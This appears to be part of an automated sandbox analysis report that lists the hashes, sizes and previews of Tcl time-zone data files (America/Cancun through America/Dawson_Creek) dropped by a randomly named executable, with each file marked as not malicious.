                                                                                                                                                                                                                              SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                              Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                              MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                              SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
                                                                                                                                                                                                                              SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                              SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):227
                                                                                                                                                                                                                              Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                              MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                              SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                              SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                              SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                              MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                              SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                              SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                              SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.774923706273939
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE91mr4IAcGEu5pvn:SlSWB9vsM3y7oDSHAIgpdN/2909Yr49F
                                                                                                                                                                                                                              MD5:AD6E086BEDF05A0BEB66990BD9518BEE
                                                                                                                                                                                                                              SHA1:FA0B7E8D6931E79092A90F7EECBA2293AE886AE3
                                                                                                                                                                                                                              SHA-256:C38C49AE1C3E67BD2118002DCFCC3C0EFB6892FB9B0106908A9282C414D0BF2E
                                                                                                                                                                                                                              SHA-512:A1E40422D15DBCB24A6FE353639A1541FAD7F394D20F8AEB32D4E39667BA264C3E815BAA703B88B90D381540168016A0641CA220BACAF05E80EAA698642B6FFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Cayman) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11372
                                                                                                                                                                                                                              Entropy (8bit):3.814348526052702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:l6u30Ke1rdJ8SUklvgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:l1EKwdJ8SUkl4aUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:763E23AA7FB20F8D7CB2F0E87FAFD153
                                                                                                                                                                                                                              SHA1:B131A10C1C208BB5E5E178ACD21A679FD0537AC5
                                                                                                                                                                                                                              SHA-256:C7707AF88D650F90839E7258356E39D85228B33B6DBCC5C065C3D8733AE28CEE
                                                                                                                                                                                                                              SHA-512:FE9C5D2EA253338DDFD79CC8ED2F94D6817BD770C0895752EFB1917E2313735C18475D67191C29BCCD53DEFFF35C1BF0CA5D98C92091DDCD1E97CD6302DC73A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2040
                                                                                                                                                                                                                              Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                              MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                              SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                              SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                              SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                              MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                              SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                              SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                              SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                              MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                              SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                              SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                              SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                                              Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                              MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                              SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                              SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                              SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                              MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                              SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                              SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                              SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2912
                                                                                                                                                                                                                              Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                              MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                              SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                              SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                              SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                              MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                              SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                              SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                              SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1128
                                                                                                                                                                                                                              Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                              MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                              SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                              SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                              SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2967
                                                                                                                                                                                                                              Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                              SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                              SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                              SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                              MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                              SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                              SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                              SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8920
                                                                                                                                                                                                                              Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                              SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                              SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                              SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
